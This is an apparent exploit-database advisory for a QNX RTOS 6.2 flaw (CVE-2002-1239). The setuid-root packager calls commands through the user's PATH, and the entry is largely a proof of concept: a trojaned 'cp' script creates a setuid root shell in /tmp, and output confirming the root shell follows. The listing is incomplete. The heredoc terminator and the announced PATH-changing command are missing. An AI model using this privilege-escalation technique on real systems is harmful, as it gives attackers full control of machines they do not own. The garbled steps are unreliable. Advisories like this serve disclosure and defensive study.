QNX RTOS 6.2 - Application Packager Non-Explicit Path Execution

Related Vulnerabilities: CVE-2002-1239  
Publish Date: 08 Nov 2002
Author: Texonet

                source: http://www.securityfocus.com/bid/6146/info

A vulnerability has been discovered in an application packager shipped with QNX RTOS. It should be noted that the vulnerable packager is installed setuid root by default.

It has been reported that the packager fails to use absolute paths to execute system commands. This could potentially allow an attacker to trick the program into running a trojaned binary.

Because the vulnerable packager is installed setuid root by default, this could allow a local attacker to take complete control over a system. 

$ cat > cp <<EOF
> #!/bin/sh
> /bin/cp /bin/sh /tmp/sh
> chmod 4755 /tmp/sh
$ chmod 755 cp

The attacker then modifies the PATH environment variable to search
the current working directory before anything else:


The attacker now creates a directory and calls the packager on that
created directory:

$ mkdir temp
$ packager temp

The packager will ask a number of questions. When the procedure is
complete, a root shell will be waiting for the attacker:

$ ls -l /tmp/sh
- -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh